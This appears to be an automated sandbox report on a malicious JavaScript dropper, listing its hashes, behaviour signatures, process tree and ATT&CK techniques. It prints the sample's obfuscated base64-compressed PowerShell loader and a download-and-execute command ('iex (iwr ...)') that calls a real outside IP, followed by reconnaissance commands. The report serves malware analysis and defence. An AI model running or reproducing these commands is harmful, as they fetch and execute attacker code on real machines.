Overview

overview

10

Static

static

1.js

windows7-x64

1

1.js

windows10-2004-x64

8

2.js

windows7-x64

10

2.js

windows10-2004-x64

10

Analysis

  • max time kernel
    144s
  • max time network
    147s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    23-01-2023 13:08

Sharing

Copy URL
Twitter E-mail
Report Analysis Logs

General

  • Target

    1.js

  • Size

    40KB

  • MD5

    f297762186cba5a11c2d09c66b61ae97

  • SHA1

    5a38dcaac81399d9d6c2bbbac0cc601e4a6950d9

  • SHA256

    ef8acdcee4cf21c8a88af63119596dfe7b4971b53d4e96b0a05500c7ae50b1d3

  • SHA512

    b6ff2066d8d091f9b64b60b9d48a604ebd6dc038877aa6764d39db7347d5173debe4ab46ddf94d09d93777bb3d696f5c7a2b33469ac2a84b83fdffed27cadc32

  • SSDEEP

    384:4EZdlKCY9L+gGpL0trwZxyHa9q0w7cft19UQ1+e9d0dpcbg:42ladGpLgwKGRF1eBcbg

Score
8/10

Malware Config

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Checks computer location settings 2 TTPs 2 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Enumerates processes with tasklist 1 TTPs 1 IoCs
  • Gathers system information 1 TTPs 1 IoCs

    Runs systeminfo.exe.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of WriteProcessMemory 16 IoCs

Processes

  • C:\Windows\system32\wscript.exe
    wscript.exe C:\Users\Admin\AppData\Local\Temp\1.js
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4348
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exECutionpO byPasS "(neW-oBJeCT Io.CoMPrEsSIon.DEfLaTesTrEam([SYstEM.iO.MemOryStREAM] [sYStEm.CONvErT]::fRombASe64sTrING( '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') ,[iO.cOMpRESsIoN.COmpRESsioNmodE]::dEcoMPReSS)| %{neW-oBJeCT SySTEM.Io.STREAmREADER( $_ ,[text.enCoDing]::asCIi)} | % {$_.reADtOeNd()} ) | . ( $shelLID[1]+$sHeLliD[13]+'x')"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2404
      • C:\Windows\system32\whoami.exe
        "C:\Windows\system32\whoami.exe"
        3⤵
        • Suspicious use of AdjustPrivilegeToken
        PID:480
  • C:\Windows\System32\WScript.exe
    C:\Windows\System32\WScript.exe "C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\3E52C9BE404FB11A.vbs" "iex (iwr -useb http://159.203.143.66/r/awsase/FC519B30E47289DA)"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:4216
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -exec bypass iex (iwr -useb http://159.203.143.66/r/awsase/FC519B30E47289DA)
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of WriteProcessMemory
      PID:4788
      • C:\Windows\system32\whoami.exe
        "C:\Windows\system32\whoami.exe"
        3⤵
          PID:4360
        • C:\Windows\system32\systeminfo.exe
          "C:\Windows\system32\systeminfo.exe"
          3⤵
          • Gathers system information
          PID:1804
        • C:\Windows\system32\whoami.exe
          "C:\Windows\system32\whoami.exe" /all
          3⤵
            PID:1652
          • C:\Windows\system32\nltest.exe
            "C:\Windows\system32\nltest.exe" /domain_trusts
            3⤵
              PID:1788
            • C:\Windows\system32\tasklist.exe
              "C:\Windows\system32\tasklist.exe"
              3⤵
              • Enumerates processes with tasklist
              PID:2352
        • C:\Windows\system32\msiexec.exe
          C:\Windows\system32\msiexec.exe /V
          1⤵
            PID:1592

          Network

          MITRE ATT&CK Matrix ATT&CK v6

          Initial Access

          Execution

          Persistence

          Privilege Escalation

          Defense Evasion

          Credential Access

          Discovery

          Query Registry

          1
          T1012

          System Information Discovery

          3
          T1082

          Process Discovery

          1
          T1057

          Lateral Movement

          Collection

          Exfiltration

          Command and Control

          Impact

          Replay Monitor

          Loading Replay Monitor...

          Downloads

          • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log
            Filesize

            3KB

            MD5

            00e7da020005370a518c26d5deb40691

            SHA1

            389b34fdb01997f1de74a5a2be0ff656280c0432

            SHA256

            a529468d442b807290b41565130e4c52760af9abec37613114db3857f11ad4fe

            SHA512

            9a02bacc6fb922d6202548e80e345c6cdec346b79ef7ac7a56f89fd342ff128de004065b9d010d015b54d4ca72f665ca658c7ffcd8eb906e14bfa5b48b43f2cf

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\3E52C9BE404FB11A.vbs
            Filesize

            106B

            MD5

            29814eb775761c5088028d1907f48c55

            SHA1

            cb369ec71c0a44b9b9411edf956efbb5654ab26e

            SHA256

            ceb3b2cce642a3dcda3a370c282fd0ae6daf7521a44350d302b4a1351e4ac3db

            SHA512

            a7ebcab691e6bbe52f150de7e1515f341bab3756c0941fc221d1aa40c54983b73158ff4037b11c18e1fddc2e634ea0fd5ab898cf716b02163c10d98159a7b3c1

            Download Submit
          • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
            Filesize

            1KB

            MD5

            0e1b28e135526ea20c11b043a1446714

            SHA1

            dbe0124e99913c3989c0b723847f118fd79b1caa

            SHA256

            d4be4d17801b57e3ddf6caa161dc5722bf2101c7020ae40013065d7023268fa7

            SHA512

            65cd6f68d19d24255004488875f2a3416ec0fa174aa2548828e8a2a9ccb04c3b3a43a66c3aeb2a385d78953307d1786fd7875f24e37a75f8e0826ea6090d5d2c

            Download Submit
          • memory/480-135-0x0000000000000000-mapping.dmp
            Download
          • memory/1652-144-0x0000000000000000-mapping.dmp
            Download
          • memory/1788-145-0x0000000000000000-mapping.dmp
            Download
          • memory/1804-142-0x0000000000000000-mapping.dmp
            Download
          • memory/2352-146-0x0000000000000000-mapping.dmp
            Download
          • memory/2404-133-0x000002087EDA0000-0x000002087EDC2000-memory.dmp
            Filesize

            136KB

            Download
          • memory/2404-136-0x00007FF8836B0000-0x00007FF884171000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/2404-132-0x0000000000000000-mapping.dmp
            Download
          • memory/2404-134-0x00007FF8836B0000-0x00007FF884171000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/4360-141-0x0000000000000000-mapping.dmp
            Download
          • memory/4788-143-0x00007FF8836B0000-0x00007FF884171000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/4788-138-0x0000000000000000-mapping.dmp
            Download
          • memory/4788-147-0x00007FF8836B0000-0x00007FF884171000-memory.dmp
            Filesize

            10.8MB

            Download
          • memory/4788-148-0x000002439D890000-0x000002439DA52000-memory.dmp
            Filesize

            1.8MB

            Download
          • memory/4788-149-0x00007FF8836B0000-0x00007FF884171000-memory.dmp
            Filesize

            10.8MB

            Download